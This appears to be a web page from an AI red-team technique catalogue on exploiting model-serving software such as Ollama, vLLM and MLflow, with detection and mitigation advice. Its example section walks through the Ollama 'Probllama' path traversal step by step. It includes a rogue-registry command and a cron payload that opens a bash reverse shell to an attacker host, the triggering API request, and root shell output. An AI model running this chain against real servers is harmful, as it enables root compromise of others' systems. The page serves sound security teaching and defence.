Skip to main content

INF-001: Model Server Exploitation

CategoryInfrastructure
FrameworksATLAS: ML Supply Chain · OWASP: LLM05

Exploit vulnerabilities in model serving infrastructure. Ollama, vLLM, TGI, and MLflow have had critical CVEs enabling path traversal, code execution, and data theft.

Technique

# Notable model server CVEs:
CVE-2024-37032 (Ollama "Probllama")
  - Digest path traversal -> arbitrary file write
CVE-2024-45436 (Ollama zip traversal)
  - Model import -> file overwrite
CVE-2023-2780 (MLflow)
  - Source validation bypass -> code execution

# Attack pattern:
1. Enumerate model server (version, API)
2. Check for known CVEs
3. Chain file write with code execution
4. Pivot to host or container escape

Key Concepts

  • Model servers are high-value targets with large attack surfaces. They typically run with elevated privileges (GPU access, filesystem access for model storage, network access for API serving) and process untrusted input in the form of model files, API requests, and configuration data.
  • Path traversal vulnerabilities are endemic to model serving. Model import, digest handling, and snapshot operations all involve file system paths derived from user-controlled input. Ollama's Probllama (CVE-2024-37032) demonstrated how digest values can be weaponized for arbitrary file writes through path traversal.
  • The attack chain typically escalates from file write to code execution. An arbitrary file write primitive can overwrite cron jobs, SSH authorized keys, systemd services, or application code to achieve remote code execution. In containerized deployments, this becomes the first step toward container escape.
  • Many model servers default to no authentication. Ollama, vLLM, and similar tools are designed for local development and often bind to all interfaces without authentication. In production deployments, this default is frequently unchanged.
  • Supply chain attacks through model registries compound the risk. A compromised model file downloaded from a public registry can exploit deserialization vulnerabilities on load, giving the attacker code execution before any inference request is made.

Detection

  • Monitor model server API endpoints for anomalous requests. Path traversal attempts (sequences like ../, URL-encoded variants, or overly long paths) in model pull, push, or import operations are strong indicators of exploitation.
  • Track file system changes outside expected model storage directories. Model servers should only write to designated model storage paths. File creation or modification outside these directories, especially in system directories, signals a successful path traversal attack.
  • Alert on model server version and known CVE correlation. Maintain a mapping of deployed model server versions to known vulnerabilities and generate alerts when vulnerable versions are detected in the environment.

Mitigation

  • Keep model servers updated and track AI-specific CVEs. The AI infrastructure vulnerability landscape is evolving rapidly. Subscribe to security advisories for Ollama, vLLM, TGI, MLflow, and other deployed model servers.
  • Never expose model servers directly to untrusted networks. Place model servers behind an API gateway with authentication, rate limiting, and input validation. The model server should be reachable only from trusted internal services.
  • Run model servers in sandboxed environments (containers with minimal privileges, read-only filesystems where possible, no host network access) to limit the impact of successful exploitation. Apply the principle of least privilege to GPU and filesystem access.

Example Output

The following demonstrates CVE-2024-37032 (Ollama "Probllama") exploitation against a vulnerable Ollama instance. This is a path traversal via the digest parameter in the model pull API that enables arbitrary file write on the host.

Authorized testing only. This technique should only be used during sanctioned engagements with explicit written authorization. CVE-2024-37032 was responsibly disclosed and patched in Ollama v0.1.34.

Step 1: Enumerate Ollama Version

$ curl -s http://10.10.14.50:11434/api/version
{
  "version": "0.1.29"
}

Version 0.1.29 is vulnerable to CVE-2024-37032. Versions prior to 0.1.34 do not sanitize the digest parameter in pull operations, allowing path traversal.

Step 2: Create a Malicious Manifest

First, set up a rogue registry server that serves a manifest with a traversal digest. The digest value controls the file path where Ollama writes the blob content.

# Start a minimal rogue registry on the attacker box
$ python3 rogue_registry.py --listen 10.10.14.9:5000 \
  --digest '../../../etc/cron.d/revshell' \
  --payload '* * * * * root bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"'
[*] Rogue registry listening on 10.10.14.9:5000
[*] Serving manifest with digest: ../../../etc/cron.d/revshell
[*] Payload size: 74 bytes

Step 3: Trigger the Pull from the Rogue Registry

The key to Probllama: the digest value does NOT use the sha256: prefix. Raw traversal paths only. The : to - replacement in Ollama's code would create literal directory names and break the traversal.

$ curl -s -X POST http://10.10.14.50:11434/api/pull \
  -d '{"name": "10.10.14.9:5000/evil", "insecure": true}'
{"status":"pulling manifest"}
{"status":"pulling ../../../etc/cron.d/revshell","digest":"../../../etc/cron.d/revshell","total":74,"completed":74}
{"status":"verifying sha256 digest"}
{"status":"writing manifest"}
{"status":"success"}

Ollama followed the traversal path and wrote the payload content to /etc/cron.d/revshell on the target host.

Step 4: Catch the Reverse Shell

$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.9] from (UNKNOWN) [10.10.14.50] 48216
bash: cannot set terminal type, not a terminal
root@ollama-prod:/# id
uid=0(root) gid=0(root) groups=0(root)
root@ollama-prod:/# cat /etc/hostname
ollama-prod
root@ollama-prod:/# ls /root/.ollama/models/manifests/
registry.ollama.ai

Step 5: Verify the Written File

root@ollama-prod:/# cat /etc/cron.d/revshell
* * * * * root bash -c "bash -i >& /dev/tcp/10.10.14.9/4444 0>&1"
root@ollama-prod:/# ls -la /etc/cron.d/revshell
-rw-r--r-- 1 root root 74 Sep 14 03:22 /etc/cron.d/revshell

The entire chain, from unauthenticated API access to root shell, requires only two HTTP requests (one to the rogue registry setup, one to trigger the pull). The fix in Ollama v0.1.34 validates digest values to prevent directory traversal characters.